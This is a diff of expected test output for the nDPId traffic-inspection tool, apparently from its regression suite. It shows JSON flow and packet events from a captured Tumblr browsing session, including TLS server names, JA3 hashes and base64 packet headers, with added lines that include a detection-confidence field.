-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="}
 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="}
-00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="}
-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="}
-00633{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="}
-00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -86,8 +86,8 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="}
